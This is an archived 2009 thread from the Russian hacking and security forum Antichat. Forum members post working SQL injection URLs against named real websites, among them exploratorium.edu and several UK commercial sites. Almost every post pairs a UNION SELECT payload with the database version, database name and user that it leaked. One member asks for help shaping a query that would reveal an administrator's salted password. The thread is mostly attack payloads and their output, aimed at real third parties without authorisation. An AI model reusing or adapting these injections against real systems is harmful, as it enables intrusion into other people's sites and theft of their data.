ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10391  
Старый 13.08.2009, 00:04
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
Провел на форуме:
174909

Репутация: 454
По умолчанию

Цитата:
http://www.kbb-forum.net/journal/content.php3?id=21+union+select+1,concat(0x2,datab ase(),user(),version()),3,4,5,6,7,8,9,10,11,12+lim it+1,1
Цитата:
http://www.universaledition.com/truman/en_templates/view.php3?f_id=17+union+select+concat_ws(0x3,versi on(),user(),database()),2
5.0.32-Debian_7etch8-log www@localhost truman
 
Ответить с цитированием

  #10392  
Старый 13.08.2009, 01:02
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885

Репутация: 34
По умолчанию

http://kryolan.s10.omatix.de/en/index.php?mnu=612&id=35+limit+0+UNION+SELECT+1,CON CAT(version(),database(),user()),3,4--

database Version: 5.0.32-Debian_7etch8-log
database name: kryolansql1
user name: kryolansql1@localhost
 
Ответить с цитированием

  #10393  
Старый 13.08.2009, 01:28
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885

Репутация: 34
По умолчанию

http://www.gripskateshop.co.uk/index.php?ID=35+limit+0+UNION+SELECT+1,CONCAT(vers ion(),database(),user()),3,4,5,6--

database Version: 5.0.82-community
database name: web36-user-2
user name: web36-user-2@localhost
 
Ответить с цитированием

  #10394  
Старый 13.08.2009, 01:31
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Код:
http://pescaderiascorunesas.es/gran_cocina/autor/?id=-13+union+select+1,2,3,4,CONCAT(version(),database(),user()),6,7,8,9--
4.1.25-Debian_mt1db25093_pescaderiasdb25093@64.13.232.33
 
Ответить с цитированием

  #10395  
Старый 13.08.2009, 01:32
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

PR 8
http://exploratorium.edu/webcasts/explotv_player.php?id=-00000759+union+select+version(),2,3/*

Database Version: 5.0.33
Database name: ExploMedia
User name: MediaRead@207-7-139-21.exploratorium.edu
 
Ответить с цитированием

  #10396  
Старый 13.08.2009, 01:42
lexus5122
Новичок
Регистрация: 16.03.2007
Сообщений: 24
Провел на форуме:
145084

Репутация: 2
По умолчанию

http://www.eored.ru/faq.php?s=&do=search&q=%00'&match=all&titlesonly=0

Видно что есть инъекция, но запрос походу не верный ( иначе бы показался админский пасс с солью (
Помогите пожалуйста сформировать правельный...
 
Ответить с цитированием

  #10397  
Старый 13.08.2009, 01:59
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885

Репутация: 34
По умолчанию

http://www.terfeliaid.co.uk/index.php?page=4&id=35+limit+0+UNION+SELECT+1,CONC AT(version(),database(),user()),3,4,5,6,7,8--

database Version: 5.0.22-Debian_0ubuntu6.06.11-log
database name: terfeliaid_db
user name: terfeliaid2@localhost
 
Ответить с цитированием

  #10398  
Старый 13.08.2009, 02:14
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885

Репутация: 34
По умолчанию

http://takproperty.co.uk/search.php?ref_id=&status=-&region=-&location=7+limit+0+UNION+SELECT+CONCAT(version(), database(),user()),2,3,4,5--
database Version: 5.0.67-percona-highperf-b10-log
database name: takprop_takeproperty
user name: takprop_admin@localhost
 
Ответить с цитированием

  #10399  
Старый 13.08.2009, 02:36
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885

Репутация: 34
По умолчанию

http://www.wickesmedia.co.uk/site/pages/newsitem.php?id=35+UNION+SELECT+1,2,AES_DECRYPT(AE S_ENCRYPT(CONCAT(version(),database(),user()),0x71 ),0x71),4,5,6,7,8,9,10,11--

database Version: 5.0.17-standard
database name: wickesdb
user name: wickesdata@bfb1.hotchilli.net
 
Ответить с цитированием

  #10400  
Старый 13.08.2009, 03:14
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.uiartsfaculty.net/cv/showcv.php?id=-51+union+select+1,2,3,4,5,6,version(),8,9,0,1,2,3, 4,5,6,7,8,9,0,1,22--

Database Version: 5.0.81-community-log
Database name: cactilio_uifacultyofarts
User name: cactilio_ui@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ